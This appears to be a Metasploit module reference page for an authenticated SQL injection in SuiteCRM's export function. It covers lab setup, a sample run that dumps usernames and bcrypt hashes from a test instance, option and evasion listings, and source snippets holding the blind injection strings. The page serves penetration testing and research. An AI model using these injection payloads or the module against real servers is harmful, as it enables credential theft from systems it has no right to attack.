SuiteCRM authenticated SQL injection in export functionality - Metasploit
This page contains detailed information about how to use the auxiliary/gather/suite_crm_export_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SuiteCRM authenticated SQL injection in export functionality
Module: auxiliary/gather/suite_crm_export_sqli
Source code: modules/auxiliary/gather/suite_crm_export_sqli.rb
Disclosure date: 2022-05-24
Last modification time: 2022-09-12 23:46:10 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -
This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability allows an authenticated attacker to send specially crafted requests to the export entry point of the application in order to retrieve all the usernames and their associated password from the database.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/gather/suite_crm_export_sqli
msf auxiliary(suite_crm_export_sqli) > show targets
... a list of targets ...
msf auxiliary(suite_crm_export_sqli) > set TARGET target-id
msf auxiliary(suite_crm_export_sqli) > show options
... show and set options ...
msf auxiliary(suite_crm_export_sqli) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Description
This module exploits an authenticated SQL injection in SuiteCRM installations below or equal to version 7.12.5. The vulnerability allows for union and blind boolean based SQLi to be exploited in order to collect usernames and password hashes from the SuiteCRM database.
Vulnerable Application
The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM.
There should be one in SuiteCRM by default for the administrative user. If you want to test multiple users,
browse to /index.php?module=Users&action=index
and then click the Create New User
button on the left side
of the screen. Then enter a username and a last name. Then click the password
tab, and enter a password for
the user, then confirm this password and click the Save
button to create the user.
Docker compose
Prerequisites: Docker and Docker Compose must be installed first.
To create a SuiteCRM 7.12.5 Docker container, first create a new folder,
then save the following content as docker-compose.yml
:
version: '2'
services:
mariadb:
image: docker.io/bitnami/mariadb:10.6
environment:
# ALLOW_EMPTY_PASSWORD is recommended only for development.
- ALLOW_EMPTY_PASSWORD=yes
- MARIADB_USER=bn_suitecrm
- MARIADB_DATABASE=bitnami_suitecrm
- MARIADB_PASSWORD=bitnami123
volumes:
- 'mariadb_data:/bitnami/mariadb'
suitecrm:
image: docker.io/bitnami/suitecrm:7.12.5
ports:
- '80:8080'
- '443:8443'
environment:
- SUITECRM_DATABASE_HOST=mariadb
- SUITECRM_DATABASE_PORT_NUMBER=3306
- SUITECRM_DATABASE_USER=bn_suitecrm
- SUITECRM_DATABASE_NAME=bitnami_suitecrm
- SUITECRM_DATABASE_PASSWORD=bitnami123
# ALLOW_EMPTY_PASSWORD is recommended only for development.
- ALLOW_EMPTY_PASSWORD=yes
volumes:
- 'suitecrm_data:/bitnami/suitecrm'
depends_on:
- mariadb
volumes:
mariadb_data:
driver: local
suitecrm_data:
driver: local
Finally, in the same directory as the docker-compose.yml
file, run: docker-compose up -d
.
Note that the default username to log in will be user
and the password will be bitnami
. If you
want to change these, put the following lines under the environment
section:
environment:
- SUITECRM_USERNAME=my_user
- SUITECRM_PASSWORD=my_password
The above would set the username to my_user
and the password to my_password
.
For more information on the docker compose file, refer to https://github.com/bitnami/containers/tree/main/bitnami/suitecrm.
Install from source
Source code can be found here: SuiteCRM v7.12.5
Instructions on installing from source can be found here: Installation Guide
The following setup was installed on Ubuntu 20.04:
Setup and install MySQL:
sudo apt update
sudo apt install mysql-server
sudo systemctl start mysql.service
sudo mysql
(open the mysql prompt)mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
(change the password of the root user)
Install Apache
sudo apt install apache2
sudo systemctl enable apache2
sudo systemctl start apache2
Install php and its dependencies
sudo apt -y install php7.4
sudo apt install -y php-cli php-common php-curl php-mbstring php-gd php-mysql php-soap php-xml php-imap php-intl php-opcache php-json php-zip
sudo apt install composer
composer install
Setup and install SuiteCRM 7.12.5
wget https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz
gunzip v7.12.5.tar.gz
tar -xvf v7.12.5.tar
sudo cp -r SuiteCRM-7.12.5/. /var/www/html
cd /var/www/html
sudo chown -R www-data:www-data .
sudo chmod -R 755 .
sudo chmod -R 775 custom modules themes data upload
sudo chmod 775 config_override.php 2>/dev/null
- Navigate to http://localhost/install.php and follow the installation wizard to complete the install
Verification Steps
- Start up metasploit
- Do:
use auxiliary/gather/suite_crm_export_sqli
- Do:
set RHOSTS [IP]
- Configure a user and password by setting
USERNAME
andPASSWORD
. - Do:
run
Scenarios
SuiteCRM 7.12.5 Bitnami Docker Image
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/suite_crm_export_sqli
msf6 auxiliary(gather/suite_crm_export_sqli) > show options
Module options (auxiliary/gather/suite_crm_export_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 3 no Number of users to enumerate
PASSWORD yes Password for user
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
loit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME yes Username of user
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Dump credentials Dumps usernames and passwords from the users table
msf6 auxiliary(gather/suite_crm_export_sqli) > set USERNAME user
USERNAME => user
msf6 auxiliary(gather/suite_crm_export_sqli) > set PASSWORD bitnami
PASSWORD => bitnami
msf6 auxiliary(gather/suite_crm_export_sqli) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(gather/suite_crm_export_sqli) > check
[*] Authenticating as user
[+] Authenticated as: user
[*] Version detected: 7.12.5
[+] 127.0.0.1:80 - The target is vulnerable.
msf6 auxiliary(gather/suite_crm_export_sqli) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating as user
[+] Authenticated as: user
[*] Version detected: 7.12.5
[+] The target is vulnerable.
[*] Fetching Users, please wait...
SuiteCRM User Names
===================
Username
--------
testuser
user
[*] Fetching Hashes, please wait...
[+] (1/2) Username : testuser ; Hash : $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
[+] (2/2) Username : user ; Hash : $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
SuiteCRM User Credentials
=========================
Username Hash
-------- ----
testuser $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
user $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
[*] Auxiliary module execution completed
msf6 auxiliary(gather/suite_crm_export_sqli) >
Go back to menu.
Msfconsole Usage
Here is how the gather/suite_crm_export_sqli auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/suite_crm_export_sqli
msf6 auxiliary(gather/suite_crm_export_sqli) > show info
Name: SuiteCRM authenticated SQL injection in export functionality
Module: auxiliary/gather/suite_crm_export_sqli
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2022-05-24
Provided by:
Exodus Intelligence
jheysel-r7
Redouane NIBOUCHA <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available actions:
Name Description
---- -----------
Dump credentials Dumps usernames and passwords from the users table
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 3 no Number of users to enumerate
PASSWORD yes Password for user
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME yes Username of user
VHOST no HTTP server virtual host
Description:
This module exploits an authenticated SQL injection in SuiteCRM in
versions before 7.12.6. The vulnerability allows an authenticated
attacker to send specially crafted requests to the export entry
point of the application in order to retrieve all the usernames and
their associated password from the database.
References:
https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/
https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6
Module Options
This is a complete list of options available in the gather/suite_crm_export_sqli auxiliary module:
msf6 auxiliary(gather/suite_crm_export_sqli) > show options
Module options (auxiliary/gather/suite_crm_export_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 3 no Number of users to enumerate
PASSWORD yes Password for user
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
USERNAME yes Username of user
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Dump credentials Dumps usernames and passwords from the users table
Advanced Options
Here is a complete list of advanced options supported by the gather/suite_crm_export_sqli auxiliary module:
msf6 auxiliary(gather/suite_crm_export_sqli) > show advanced
Module advanced options (auxiliary/gather/suite_crm_export_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for
non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
.2)
SqliDelay 1.0 no The delay to sleep on time-based blind SQL injections
UserAgent Mozilla/5.0 (Macintosh; Intel Mac OS no The User-Agent header to use for all requests
X 12.2; rv:97.0) Gecko/20100101 Firef
ox/97.0
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/suite_crm_export_sqli module can do:
msf6 auxiliary(gather/suite_crm_export_sqli) > show actions
Auxiliary actions:
Name Description
---- -----------
Dump credentials Dumps usernames and passwords from the users table
Evasion Options
Here is the full list of possible evasion options supported by the gather/suite_crm_export_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/suite_crm_export_sqli) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apac
he)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apa
che)
HTTP::shuffle_get_params false no Randomize order of GET parameters
HTTP::shuffle_post_params false no Randomize order of POST parameters
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Unable to authenticate to SuiteCRM
- Trying to query the SuiteCRM version information failed
- Could not find retrieve the version of SuiteCRM from the version page
- Failed to authenticate as: <USERNAME>
- The server did not respond to the request with the payload: <PAYLOAD>
- The server responded unexpectedly to a request sent with uid: ",,))+AND+1=2;+--+"
- comma in payload
- Somehow this got messed up!
- Somehow this got messed up!
- Unable to authenticate to SuiteCRM
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Unable to authenticate to SuiteCRM
Here is a relevant code snippet related to the "Unable to authenticate to SuiteCRM" error message:
50: ]
51: end
52:
53: def check
54: authenticated = authenticate
55: return Exploit::CheckCode::Safe('Unable to authenticate to SuiteCRM') unless authenticated
56:
57: res = send_request_cgi(
58: {
59: 'method' => 'GET',
60: 'uri' => normalize_uri(target_uri, 'index.php'),
Trying to query the SuiteCRM version information failed
Here is a relevant code snippet related to the "Trying to query the SuiteCRM version information failed" error message:
64: 'action' => 'About'
65: }
66: }
67: )
68:
69: return Exploit::CheckCode::Safe('Trying to query the SuiteCRM version information failed') unless res&.body
70:
71: version = Rex::Version.new(res.body.match(/Version\s+((?:\d+\.)+\d+).*/)[1])
72: return Exploit::CheckCode::Safe('Could not find retrieve the version of SuiteCRM from the version page') unless version
73:
74: print_status "Version detected: #{version}"
Could not find retrieve the version of SuiteCRM from the version page
Here is a relevant code snippet related to the "Could not find retrieve the version of SuiteCRM from the version page" error message:
67: )
68:
69: return Exploit::CheckCode::Safe('Trying to query the SuiteCRM version information failed') unless res&.body
70:
71: version = Rex::Version.new(res.body.match(/Version\s+((?:\d+\.)+\d+).*/)[1])
72: return Exploit::CheckCode::Safe('Could not find retrieve the version of SuiteCRM from the version page') unless version
73:
74: print_status "Version detected: #{version}"
75:
76: return Exploit::CheckCode::Vulnerable if version <= Rex::Version.new('7.12.5')
77:
Failed to authenticate as: <USERNAME>
Here is a relevant code snippet related to the "Failed to authenticate as: <USERNAME>" error message:
127:
128: if res && res.code == 200 && res.body.include?('SuiteCRM') && res.get_cookies.include?('sugar_user_theme=') && res.body.include?('SUGAR.unifiedSearchAdvanced')
129: print_good("Authenticated as: #{datastore['USERNAME']}")
130: true
131: else
132: print_error("Failed to authenticate as: #{datastore['USERNAME']}")
133: false
134: end
135: end
136:
137: # This module sends this same request multiple times. In order to reduce code it has beed moved it into it's owm method
The server did not respond to the request with the payload: <PAYLOAD>
Here is a relevant code snippet related to the "The server did not respond to the request with the payload: <PAYLOAD>" error message:
147: 'action' => 'index'
148: }
149: })
150:
151: if res&.code != 200
152: fail_with(Failure::UnexpectedReply, "The server did not respond to the request with the payload: #{payload}")
153: end
154: res
155: end
156:
157: # @return an array of usernames
The server responded unexpectedly to a request sent with uid: ",\,))+AND+1=2;+--+"
Here is a relevant code snippet related to the "The server responded unexpectedly to a request sent with uid: ",\,))+AND+1=2;+--+"" error message:
188: hashes
189: end
190:
191: def init_sqli
192: wrong_resp_length = send_injection_request_cgi(',\\,))+AND+1=2;+--+')&.body&.length
193: fail_with(Failure::UnexpectedReply, 'The server responded unexpectedly to a request sent with uid: ",\\,))+AND+1=2;+--+"') unless wrong_resp_length
194: sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
195: fail_with(Failure::BadConfig, 'comma in payload') if payload.include?(',')
196: resp_length = send_injection_request_cgi(",\\,))+OR+(#{payload});+--+")&.body&.length
197: resp_length != wrong_resp_length
198: end
comma in payload
Here is a relevant code snippet related to the "comma in payload" error message:
190:
191: def init_sqli
192: wrong_resp_length = send_injection_request_cgi(',\\,))+AND+1=2;+--+')&.body&.length
193: fail_with(Failure::UnexpectedReply, 'The server responded unexpectedly to a request sent with uid: ",\\,))+AND+1=2;+--+"') unless wrong_resp_length
194: sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
195: fail_with(Failure::BadConfig, 'comma in payload') if payload.include?(',')
196: resp_length = send_injection_request_cgi(",\\,))+OR+(#{payload});+--+")&.body&.length
197: resp_length != wrong_resp_length
198: end
199:
200: # redefine blind_detect_length and blind_dump_data because of the bad characters the payload cannot include
Somehow this got messed up!
Here is a relevant code snippet related to the "Somehow this got messed up!" error message:
215: break
216: elsif blind_request("length(cast((#{query}) as binary))=#{max_length}")
217: output_length = max_length
218: break
219: else
220: fail_with(Failure::UnexpectedReply, 'Somehow this got messed up!')
221: end
222: end
223: output_length = (min_length + max_length) / 2 + 1
224: else
225: max_length = output_length
Somehow this got messed up!
Here is a relevant code snippet related to the "Somehow this got messed up!" error message:
248: break
249: elsif blind_request("(select ascii(substr((#{query}) from #{position} for 1)))=#{max_value}")
250: character_value = max_value
251: break
252: else
253: fail_with(Failure::UnexpectedReply, 'Somehow this got messed up!')
254: end
255: end
256: character_value = (min_value + max_value) / 2 + 1
257: else
258: max_value = character_value
Unable to authenticate to SuiteCRM
Here is a relevant code snippet related to the "Unable to authenticate to SuiteCRM" error message:
270: end
271:
272: def run
273: unless datastore['AutoCheck']
274: authenticated = authenticate
275: fail_with(Failure::NoAccess, 'Unable to authenticate to SuiteCRM') unless authenticated
276: end
277:
278: sqli = init_sqli
279: users = get_user_names(sqli)
280:
Go back to menu.
Related Pull Requests
- #16982 Merged Pull Request: Update Dell iDRAC login scanner to work with v8 and v9
- #17032 Merged Pull Request: Add module for pfSense pfBlockNG unauth RCE as root - CVE-2022-31814
- #17116 Merged Pull Request: Adding CVE-2022-22947 Spring Cloud Gateway RCE Exploit
- #17092 Merged Pull Request: netlm_downgrade: Cleanup and support non-Meterpreter sessions
- #16987 Merged Pull Request: guard for all possible RubySMBError conditions
- #17123 Merged Pull Request: netrc and fetchmailrc docs
- #17057 Merged Pull Request: Msf::Post::Windows::ExtAPI: Remove load_extapi method
References
- CVE: Not available
- https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/
- https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/typo3_news_module_sqli
- auxiliary/admin/http/wp_google_maps_sqli
- auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
- auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
- auxiliary/admin/mssql/mssql_escalate_execute_as_sqli
- auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
- auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli
- auxiliary/gather/alienvault_iso27001_sqli
- auxiliary/gather/alienvault_newpolicyform_sqli
- auxiliary/gather/billquick_txtid_sqli
- auxiliary/gather/dolibarr_creds_sqli
- auxiliary/gather/joomla_com_realestatemanager_sqli
- auxiliary/gather/joomla_contenthistory_sqli
- auxiliary/gather/joomla_weblinks_sqli
- auxiliary/gather/mantisbt_admin_sqli
- auxiliary/gather/peplink_bauth_sqli
- auxiliary/gather/pimcore_creds_sqli
- auxiliary/gather/solarwinds_orion_sqli
- auxiliary/gather/vbulletin_getindexablecontent_sqli
- auxiliary/gather/vbulletin_vote_sqli
- auxiliary/gather/zabbix_toggleids_sqli
- auxiliary/scanner/http/vicidial_multiple_sqli
- auxiliary/scanner/http/wordpress_cp_calendar_sqli
- auxiliary/scanner/http/wp_abandoned_cart_sqli
- auxiliary/scanner/http/wp_chopslider_id_sqli
- auxiliary/scanner/http/wp_contus_video_gallery_sqli
- auxiliary/scanner/http/wp_email_sub_news_sqli
- auxiliary/scanner/http/wp_learnpress_sqli
- auxiliary/scanner/http/wp_loginizer_log_sqli
- auxiliary/scanner/http/wp_modern_events_calendar_sqli
- auxiliary/scanner/http/wp_registrationmagic_sqli
- auxiliary/scanner/http/wp_secure_copy_content_protection_sqli
- auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
- exploit/linux/http/suitecrm_log_file_rce
- auxiliary/gather/wp_all_in_one_migration_export
Authors
- Exodus Intelligence
- jheysel-r7
- Redouane NIBOUCHA <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.